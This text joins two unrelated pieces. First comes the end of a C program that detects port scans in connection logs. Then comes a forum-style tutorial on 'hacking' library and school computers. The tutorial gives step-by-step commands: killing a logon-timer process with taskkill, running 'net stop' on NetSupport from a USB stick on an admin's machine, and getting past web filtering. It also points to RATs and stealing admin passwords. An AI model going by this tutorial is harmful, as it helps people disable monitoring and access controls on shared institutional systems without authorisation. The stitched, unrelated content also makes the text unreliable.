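        snprintf(tab[i].ip, sizeof tab[i].ip, "%s", ip);
        tab[i].nports = 0; (*nsrc)++;
    }
    for (j = 0; j < tab[i].nports; j++)
        if (tab[i].ports[j] == port) return tab[i].nports;   /* repeat hit */
    if (tab[i].nports < MAX_PORTS) tab[i].ports[tab[i].nports++] = port;
    return tab[i].nports;
}

/* Index of the line where a source first reaches SCAN_THRESHOLD ports, or -1. */
int find_scan(const char **lines, int n)
{
    struct src_stat tab[MAX_SRC];
    char ip[46];
    int nsrc = 0, port, k;
    for (k = 0; k < n; k++) {
        if (sscanf(lines[k], "%*d %45s %d", ip, &port) != 2) continue;
        if (port < 1 || port > 65535) continue;             /* malformed */
        if (record(tab, &nsrc, ip, port) >= SCAN_THRESHOLD) return k;
    }
    return -1;
}

int main(void)
{
    int hit = find_scan(SAMPLE_LOG, 8);
    if (hit >= 0) printf("possible port scan: %s\n", SAMPLE_LOG[hit]);
    return 0;
}
```

Repeated connections to the same port do not raise the count, so an ordinary client that keeps returning to port 80 and 443 is not flagged.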


HACKING LIBRARY OR SCHOOL OR COLLEGE.

Here I am going to show you how to hack a library and school.


Firstly, when you go into your local library and log on to a computer, they usually give you 20-60 mins of logged-in time... well, not any more. First go to your desktop once logged in and create a new Notepad file (not WORDPAD) and type in .........command
command.com



Save this as (anything).bat, then open it; this should run CMD/Command Prompt.
Then type in color b (this makes it look better lol)
and press Enter.

Type in tasklist and press Enter.


This should bring up the processes running on the computer.
Look for the one you think is the computer's logon; they are usually named NETsomething.exe. Look next to it: there should be 4 numbers; these are the process's PID/Process ID.
Then type in taskkill -PID (the 4 numbers) and press Enter. This should stop the process, and then you should get as long as you want ... this can be used to stop filtering and other things. PM me for other [tuts on this]...



SCHOOL or COLLEGE

Has your school got really good filtering and blocking software, or doesn't it?
Well, if it does, here's the way to stop this.
There are two easy ways to do this. One is to get a USB/PEN DRIVE and make a new batch file; the command must be net stop (the .exe file run), say for NetSupport it would be: net stop client32.exe
Save this on the USB and open it on the admin's comp. There are many other easy ways using RATs and stuff, but this is for basic hackers.
Or another way is to get an admin's pass; search for tuts on that.

Here's a good hack if your school's comps have SHIT filtering and web-blocking software and run on XP:
go onto Calculator, go to the icon in the left-hand corner and click it, then go to jump to URL and type in the web page you want. This will open the HTML page through the calculator. Good hack only for NOOBS; there are other ways using command lines and batch files, PM for that tut.